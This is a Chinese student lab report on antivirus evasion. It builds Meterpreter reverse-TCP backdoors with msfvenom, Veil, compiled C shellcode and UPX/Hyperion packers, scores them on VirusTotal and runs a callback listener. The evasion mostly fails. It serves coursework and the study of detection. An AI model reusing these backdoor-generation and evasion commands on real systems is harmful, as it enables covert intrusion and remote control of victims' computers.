实 验 报 告
| 课程名称: | 网络与系统攻防技术 |
|---|---|
| 实验序号: | 实验三 |
| 实验名称: | 免杀原理与实践 |
| 学 号: | 20232408 |
| 姓 名: | 李易骋 |
| 指导老师: | 王志强 |
| 必修/选修: | 必修 |
| 实验日期: | 2025.10.22 |
一、实验目的
(1)使用代码变形技术,如Msfvenom、Veil、加壳工具等进行恶意代码变形;
(2)利用Shellcode,结合不同编程平台编译方式实现后门程序的免杀,并通过实际杀软进行查杀验证。
二、实验内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
veil,加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
-
基础环境
-
实验过程
4.1 构造原始后门程序作为基准
直接使用命令msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.119.128 PORT=4568 -f exe > backdoor20232408.exe构造原始后门程序,交给virtustotal进行评判。
看到是40/72,即用72个杀毒引擎检测,有40个引擎判定该文件含恶意软件。以此作为基准,用于对比后续免杀效果的执行情况。
4.2 对原始后门程序伪装
使用命令msfvenom -p windows/meterpreter/reverse\_tcp -e x86/shikata\_ga\_nai -b '\x00' LHOST=192.168.119.128 PORT=4568 -f exe > backdoor-encoded20232408.exe,通过“shikata_ga_nai”的伪装方式生成后门程序。
我们来测评一下:
看到是44/72,反而检测率还高了,应该是检测软件对shikata_ga_nai作了特征分析。
我们使用多次伪装,看一下效果。使用命令msfvenom -p windows/meterpreter/reverse\_tcp -e x86/shikata\_ga\_nai -i 10 -b '\x00' LHOST=192.168.119.128 PORT=4568 -f exe > backdoor-encoded20232408.exe
结果:
并没有很显著地体现出免杀效果。
4.2 jar包伪装
我们通过msfvenom -p java/meterpreter/reverse\_tcp LHOST=192.168.119.128 LPORT=2408 x>backdoorjar20232408.jar来生成.jar文件,看一下免杀效果。
可见是34/72,免杀效果比shikata_ga_nai稍微好一点。说明利用Java平台和JVM的间接调用,可以在一定程度上模糊对恶意代码的检测,使得部分传统的检测手段失效。
4.3 php伪装
我们使用命令msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.168.119.128 LPORT=2408 x> bdphp\_20232408.php,把后门程序以php方式伪装。
检测:
发现是25/62,效果相对较好。
我们再通过对后门程序伪装十次的方式,使用命令msfvenom -p php/meterpreter/reverse\_tcp x86/shikata\_ga\_nai -i 10 LHOST=192.168.119.128 LPORT=2408 x> bdphp\_20232408.php,来测试一下:
效果显著。可以看到,通过使用php方式作多次伪装,比原程序显著提高,较未编码前也大大提高,是可以在一定程度上模糊恶意程序检测软件的判断的。
4.4 使用veil免杀工具
4.4.下载veil工具。
使用命令sudo apt update
sudo apt -y install veil,下载veil工具。
通过命令usr/share/veil/config/setup.sh --force --silent,强制并静默地运行Veil工具的初始化设置脚本。这条命令会自动安装或配置Veil运行所需的所有依赖环境和组件,期间不会向用户提问或显示过多信息,但是需要输入一次口令。
下载需要一段时间,中间基本上不需要自己手动操作。
4.4.2下载完之后,使用命令veil,界面如图所示:
我们输入use 1进入Evasion躲避模块,用以专门生成能够躲避主流杀毒软件检测的恶意可执行文件。
Use 7,进入c/meterpreter/rev_tcp.py。这是一个由Python脚本驱动的Veil-Evasion载荷,它会生成一个用C语言编写的、Meterpreter类型的、使用反向TCP连接的Windows可执行文件。
**
输入配置信息,包括攻击机器的IP与端口,以及所需要生成文件的文件名配置,具体如下:
set LHOST 192.168.119.128
[c/meterpreter/rev\_tcp>>]: set LPORT 2408
[c/meterpreter/rev\_tcp>>]: generate
根据提示路径,去找到后门程序,一般是在/var/lib/veil/output/compiled目录下。
检测:
相比原始的程序有一定提高,但是不显著。
4.4.3 c语言调用shellcode
使用命令msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.119.128 LPORT=4568 -f c
进去之后原样复制其中的十六进制代码。
vim shellcode\_20232408.c,复制代码进去,在最后加一个main函数。
执行命令i686-w64-mingw32-g++ shellcode\_20232408.c -o shellcode\_20232408.exe将其编译,检测其免杀效果:
比原程序的免杀效果有显著提升。
4.4.4 加壳技术
使用命令upx shellcode\_20232408.exe -o shellcode\_upx\_20232408.exe,对上一步生成的后门程序加壳。检测免杀效果:
反而免杀效果还变差了,推测是杀毒软件对upx壳技术做了特征检测。
4.4.5 使用加密壳Hyperion
使用命令cp shellcode\_20232408.exe /usr/share/windows-resources/hyperion/
cd /usr/share/windows-resources/hyperion
wine hyperion.exe -v shellcode\_20232408.exe shellcode\_c\_hyp\_20232408.exe
wine hyperion.exe -v shellcode\_20232408.exe shellcode\_c\_hyp\_20232408.exe
检测免杀效果:
比原程序的免杀效果还差,推测是基本所有的杀毒软件都记录了Hyperion壳特征,推荐不要使用这种方式。
4.5 组合伪装技术
先生成.c文件。msfvenom -p windows/meterpreter/reverse\_tcp -e x86/shikata\_ga\_nai -i 10 -b '\x00' LHOST=192.168.119.128 LPORT=2408 -f c > 20232408\_shellcode\_multi.c
进行编译i686-w64-mingw32-g++ 20232408\_shellcode\_multi.c -o 20232408\_shellcode\_multi.exe
upx壳加密upx 20232408\_shellcode\_multi.exe -o 20232408\_shellcode\_multi\_2.exe
hyperion壳加密wine hyperion.exe -v 20232408\_shellcode\_multi\_1.exe 20232408\_shellcode\_multi\_2.exe
检测,查杀率依旧非常高。
通过杀毒软件检测。
无法执行。
使用的杀毒软件:电脑管家,版本号3.17.14.0.
进行杀软回连尝试
use exploit/multi/handlerset payload windows/meterpreter/reverse\_tcp
set LHOST 192.168.119.128
set LPORT 2408
exploit
在windows上运行20232408_shellcode_multi_2.exe,发现无法运行。查看报错,发现被列为威胁。再次去搜索后门程序,发现已经被杀软删除了。
五、问题及解决
1.在做hyperion加壳的时候,报错找不到hyperion.exe。
解决:后来发现是没有配置环境变量,得进hyperion.exe的直接目录去做。
2.对于.exe形式的后门程序,无论如何去伪装,始终会有较高的被检测率。最低的都在28/72以上,即使是组合加密也被大量检测。
分析:结合上一个实验的“不允许使用screenshot截屏”,以及做文件上传时候写的木马会被立刻查杀/部分.dll会被立刻杀死,推测为此版本的windows安全防护做得很好。但是需要小心的是,它并不是铁板一块,不是绝对安全,不能掉以轻心。
六、回答问题
(1)杀软是如何检测出恶意代码的?
我认为一个是行为检测,动态跟踪程序运行时的行为,如果存在恶意行为,比如说发现注册表有异常变更等,就查杀。
还有一个是特征查杀,这一点在upx和hypertion加壳之中尤其明显,在套了个“壳”之后,反而检测率更高了,说明是记录了特征码。
结合学习的顶会论文,可能还有通过人工智能大数据来识别,可以提取部分敏感字节码,做最底层的查杀。
-
免杀是做什么?
免杀是指通过技术手段规避杀软的检测,使恶意代码能在目标系统中正常运行而不被拦截。
(3)免杀的基本方法有哪些?
加壳技术/java、php编码技术/c语言编码技术/混淆网络行为。
其中java/php编码技术属于格式转换,混淆网络行为更多是在web中常见。
七、实验体会
**
本次实验围绕免杀的原理与实践展开,我学习了使用 msfvenom、veil、加壳工具等进行恶意代码变形,综合运用多种工具生成后门程序并评估其免杀效果,还尝试在开启杀软的情况下进行回连测试,以此理解杀软存在的局限性。通过免杀实践及相关问题的解答,我对免杀技术的实现路径和基本原理有了初步认识。
这次实验最大的问题,或者说是困惑,就在于检测率始终下不去,除了十次php编码,其他的都是28往上,就属于是“露头就秒”的类型。而且windows的电脑管家本身杀软功能就很强,涉及到了很多底层的检测,对于恶意行为是很有识别度的,在最后尝试骗过杀软这方面一直没成功。
我认为一些陈旧的技术,比如说加壳技术,需要有新的壳出来可能才会更加有效,因为在实验中发现,杀软对壳的识别率甚至比对恶意代码的识别率高的多得多。想要免杀靠的不是老旧的技术堆叠,而是要质的突破。
在本次实验中,我学习了免杀的原理,并进行了相关实践,体验了构造免杀程序的诸多方法,收获满满。
